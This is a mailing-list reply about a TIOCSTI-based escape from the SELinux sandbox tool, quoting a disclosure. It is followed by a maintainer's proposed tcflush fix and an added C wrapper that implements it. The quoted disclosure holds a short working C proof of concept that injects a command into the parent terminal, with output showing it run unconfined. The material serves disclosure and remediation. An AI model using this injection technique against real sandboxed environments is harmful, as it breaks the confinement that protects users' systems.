On Fri, Sep 23, 2016 at 5:23 AM, <up201407890@xxxxxxxxxxxxxxxxxxx> wrote:
> Hi,
>
> When executing a program via the SELinux sandbox, the nonpriv session can
> escape to the parent session by using the TIOCSTI ioctl to push characters
> into the terminal's input buffer, allowing an attacker to escape the
> sandbox.
>
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
>
> int main()
> {
>     char *cmd = "id\n";
>     while (*cmd)
>         ioctl(0, TIOCSTI, cmd++);
>     execlp("/bin/id", "id", NULL);
> }
>
> $ gcc test.c -o test
> $ /bin/sandbox ./test
> id
> uid=1000 gid=1000 groups=1000
> context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
> $ id <------ did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

I've only just started looking at this, but it seems like we need a call
to tcflush()/ioctl(TCFLSH) in the sandbox tool immediately after the
sandboxed process exits.

Do any of the userspace tools guys have any other ideas?

--
paul moore
www.paul-moore.com
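As an added example (not the sandbox tool's own code), here is a minimal wrapper that implements the tcflush() step suggested in the reply: it runs a command, waits for it to exit, then discards whatever is still queued in the terminal's input buffer before control returns to the calling shell. The function name run_and_flush is my own.

```c
/* Added example: run a command and, as soon as it exits, drop any input
 * that was pushed into the controlling terminal while it ran (for example
 * via TIOCSTI), so the parent shell never reads those characters. */
#include <stdio.h>
#include <sys/wait.h>
#include <termios.h>
#include <unistd.h>

/* Run argv[0] as a child, wait for it, then flush pending terminal input.
 * Returns the child's exit status (0..255), or -1 on fork/wait failure
 * or if the child was killed by a signal. */
int run_and_flush(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);            /* exec failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;

    /* Injected characters sit in the tty's input queue until someone reads
     * them; discarding them here, before returning to the shell, is the
     * tcflush()/TCFLSH step. Skipped when stdin is not a terminal. */
    if (isatty(STDIN_FILENO) && tcflush(STDIN_FILENO, TCIFLUSH) < 0)
        perror("tcflush");

    if (WIFEXITED(status))
        return WEXITSTATUS(status);
    return -1;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s command [args...]\n", argv[0]);
        return 2;
    }
    int rc = run_and_flush(argv + 1);
    return rc < 0 ? 1 : rc;
}
```

The flush only covers input queued while the child was running; a more complete defence is to give the sandboxed process its own session and pseudo-terminal, since the kernel only permits TIOCSTI on the caller's controlling terminal (or with CAP_SYS_ADMIN).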